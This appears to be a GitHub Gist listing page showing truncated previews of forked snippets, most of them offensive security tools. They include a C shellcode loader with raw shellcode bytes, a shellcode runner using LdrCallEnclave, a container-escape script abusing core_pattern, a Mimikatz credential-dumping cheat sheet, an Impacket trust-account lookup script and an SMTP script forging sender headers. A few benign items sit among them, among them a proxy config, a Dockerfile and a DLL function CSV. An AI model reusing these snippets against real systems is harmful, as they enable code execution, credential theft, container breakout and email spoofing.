@emdnaia
emdnaia / JasonToddIsTheBestRobin.c
Created September 25, 2025 17:25 — forked from whokilleddb/JasonToddIsTheBestRobin.c
Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()
#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#pragma comment(lib, "wininet.lib")
// notepad.exe shellcode
char shellcode[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
@emdnaia
emdnaia / enclave.c
Created August 3, 2025 22:56 — forked from whokilleddb/enclave.c
Run shellcode using LdrCallEnclave
#include <stdio.h>
#include <windows.h>
// Shellcode template from: https://gist.github.com/kkent030315/b508e56a5cb0e3577908484fa4978f12
// Compile using: x86_64-w64-mingw32-gcc -m64 enclave.c -o enclace.exe -lntdll
EXTERN_C NTSYSAPI
NTSTATUS
NTAPI LdrCallEnclave(
_In_ PENCLAVE_ROUTINE Routine,
stream {
map $ssl_preread_server_name $singbox {
trojan.example.com trojan;
trojan-ws.example.com trojan-ws;
trojan-ws-6.example.com trojan-ws-6;
vmess.example.com vmess;
vmess-ws.example.com vmess-ws;
vmess-ws-6.example.com vmess-ws-6;
}
upstream trojan {
@emdnaia
emdnaia / lsarlookupsids3_aes.py
Created February 6, 2025 22:56 — forked from ThePirateWhoSmellsOfSunflowers/lsarlookupsids3_aes.py
Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3) (AES version)
from impacket.dcerpc.v5 import epm, lsad, rpcrt, transport, lsat, ndr, nrpc
from impacket.uuid import bin_to_uuidtup
from binascii import unhexlify
from random import randbytes
import sys
# Perform a lsarlookupsids3 with a trust account, it uses netlogon as SSP (see [MS-NRPC] 3.3)
# Pure TCP RPC is used (ncacn_ip_tcp option)
# AES is used, so you need impacket #1848 (https://github.com/fortra/impacket/pull/1848)
# Tested with impacket 0.12.0 on GOAD
@emdnaia
emdnaia / Dockerfile
Created December 16, 2024 04:05 — forked from HoKim98/Dockerfile
Multi-screen (Multi-GPU) XFCE Settings
# Copyright (c) 2023 Ho Kim ([email protected]). All rights reserved.
# Configure environment variables
ARG ROCKYLINUX_VERSION="8"
# Be ready for serving
FROM "quay.io/rockylinux/rockylinux:${ROCKYLINUX_VERSION}" as base
# Install desktop environment dependencies
RUN dnf install -y \
#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright Fortra, LLC and its affiliated companies
#
# All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
@emdnaia
emdnaia / core_pattern_escape.sh
Created October 26, 2024 19:19 — forked from magisterquis/core_pattern_escape.sh
Script to escape a container with /proc/sys/kernel/core_pattern reusing the existing shell's stdio
#!/bin/bash
#
# core_pattern_escape.sh
# Simple script to escape a container via /proc/sys/kernel/core_pattern
# By J. Stuart McMurray
# Created 20241026
# Last Modified 20241026
# Drop to /esc (or whatever name) in a container and...
#
@emdnaia
emdnaia / Mimikatz-cheatsheet
Created October 20, 2024 01:43 — forked from insi2304/Mimikatz-cheatsheet
Mimikatz Cheat Sheet
#general
privilege::debug
log
log customlogfilename.log
#sekurlsa
sekurlsa::logonpasswords
sekurlsa::logonPasswords full
@emdnaia
emdnaia / smtp.py
Created September 27, 2024 03:08 — forked from w1lsec/smtp.py
from socket import *
mail_server = ("tantotesting.mail.protection.outlook.com", 25)
client_socket = socket(AF_INET, SOCK_STREAM)
helo = "helo tantomail.com"
mail_from = "mail from: <[email protected]>"
rcpt_to = "rcpt to: <[email protected]>"
mail = """from: \x1f <,><[email protected]>\r
sender: "James Bond" <[email protected]>\r
@emdnaia
emdnaia / function-mappings.csv
Created August 31, 2024 21:17 — forked from mez-0/function-mappings.csv
Common DLL's exports mapped to descriptions and categories via an LLM
title,description,category
KERNEL32.DLL!TerminateJobObject,This function terminates all processes associated with a job- managing processes and threads.,Process and Thread Management
RPCRT4.DLL!NdrServerCall2,Facilitates remote procedure calls (RPC) but is not user-invoked.,Network Operations
SHLWAPI.DLL!StrCSpnW,Searches a string for specific characters- providing their index. Involves string manipulation rather than file or network processes.,Memory Management
GDI32FULL.DLL!UpdateColors,Updates the client area of a device context by remapping current colors to the logical palette.,System Information and Control
RPCRT4.DLL!IUnknown_AddRef_Proxy,Implements the AddRef method for interface proxies- managing reference counting in COM.,Process and Thread Management
ADVAPI32.DLL!RegEnumKeyW,Enumerates subkeys of an open registry key- indicating direct registry manipulation.,Registry Operations
SECHOST.DLL!CredDeleteA,Deletes a credential from the user's credential set- modifying stored authentication data.